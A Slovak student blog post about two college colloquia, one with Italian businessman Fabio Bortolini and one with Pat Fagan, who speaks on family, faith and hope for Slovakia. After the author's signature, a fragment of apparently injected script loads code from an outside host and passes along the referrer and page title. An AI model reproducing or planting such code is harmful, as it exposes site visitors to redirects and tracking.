Hlavne sa nebojte

Slovo kolokvium má etymologický pôvod v latinskom colloquium, čo znamená rozprava alebo rozhovor. Od začiatku akademického roka v Kolégiu sme sa stretli už pri dvoch takýchto rozhovoroch s veľmi zaujímavými hosťami zo zahraničia. Ohromnou vášňou do života a typickými talianskymi gestami nás zasypal Fabio Bortolini, úspešný podnikateľ zo severovýchodu Talianska, ale so srdcom Popradčana. Pat Fagan, riaditeľ Inštitútu pre výskum manželstva a náboženstva vo Washingtone, nás vo svojej múdrosti povzbudil, že Slovensko je nádejou pre Európu.

 

Pred našim prvým kolokviom sme boli trochu napätí – ako to bude celé prebiehať? Príde zaujímavý človek, my pamätáme, že reprezentujeme Kolégium… Do knižnice vošiel energický usmiaty muž a po predstavení Martinom Kolesárom nám svojou veľmi dobrou slovenčinou povedal: „Budeme si tykať, dobre? Alebo kto je proti, nech sa prihlási.“ Všetky ruky ostali dole. Fabio pochádza z Jezola, študoval filozofiu na Padovskej univerzite a na Slovensko ho priviedla láska k horolezectvu. Tým sa nám pokúsil nalomiť zažitý stereotyp, že cudzinci prichádzajú na Slovensko len kvôli láske k ženám. Povedzme, že úspešne. Spolu s partiou kamarátov prišiel tesne po Nežnej revolúcií zliezť si Vysoké Tatry a všimol si zbiedenú podnikateľskú situáciu v Poprade. Napadlo mu, že by mohol priniesť „biznis z Jezola“, teda podnikať so zlatom a šperkami, na Slovensko. Stalo sa a úspech na seba nenechal dlho čakať.

Fabio si tiež neskoršie otvoril kaviareň, spolu s priateľmi z Popradu už niekoľko rokov organizuje festival talianskej gastronómie a kultúry Viva Italia, a čo je najzaujímavejšie, stal sa zapáleným občianskym aktivistom Popradu. „Sadnite si spolu s priateľmi, premýšľajte, čo môžete urobiť pre váš región, a potom nemajte strach pre to obetovať mnoho,“ nabáda nás.

Fabio I

Patrick „Pat“ Fagan k nám prišiel spolu s pani Ankou Záborskou po ukončení Bratislavských Hanusových dní, kde prednášal na tému mýtov o potrate. Svoju kariéru začal ako učiteľ v Írsku a neskôr pracoval ako psychológ v Kanade. V osemdesiatych rokoch sa presunul z klinickej sféry do verejného života – pôsobil so senátorom Danom Coatsom z Indiany, až sa napokon stal námestníkom pomocného tajomníka pre rodinnú a komunitnú politiku na Ministerstve zdravotníctva a sociálnych služieb Spojených štátov vo vláde prezidenta Busha staršieho. Marriage and Religion Research Institute, ktorý je momentálne pod vedením pána Fagana, skúma vplyv manželstva, rodiny a náboženstva na deti, dospelých a na celú spoločnosť.

Mr. Fagan II

„Včera som na Národnom pochode za život videl medzi ľuďmi lásku a nádej, ktorá bola takmer hmatateľná. Viete o tom, že proporčne k obyvateľstvu je takýto pochod najväčším na svete? Ján Pavol II. mal pravdu, keď povedal, že Slovensko sa raz stane poslom nádeje pre Európu. Ale pamätáte sa na jeho prvé slová v Pontifikáte? ´Nebojte sa!´“ povzbudil nás pán Fagan a my sme sa začali ponárať do hlbších súvislostí. Pán Fagan neváhal ostať s nami ešte dlhý čas po skončení kolokvia a odpovedať na naše bližšie a osobnejšie otázky týkajúce sa vzťahov, manželstva a povolania. „Keď si tak predstavím, svätý Jozef musel byť riadny chlapík, keď si ho Všemohúci vybral za vychovávateľa svojho jednorodeného Syna. (…) Preto neváhajte ísť za svätým Jozefom, keď sa modlíte za lásku svojho života. A pestujte si svoj najväčší talent: z neho vám vyrastie množstvo ďalších a vy potom budete schopní slúžiť veľmi dobre.“

Mr. Fagan I

Ďakujeme našim hosťom za mimoriadny čas s nimi a dúfame v skorého stretnutie. Ďakujeme aj organizátorom a tešíme sa naše ďalšie rozhovory.

 

Justína Malysová

študentka KAN7s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

0 komentárov

Zanechajte komentár

Chcete sa pripojiť k diskusii?
Neváhajte prispieť!

Pridaj komentár

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *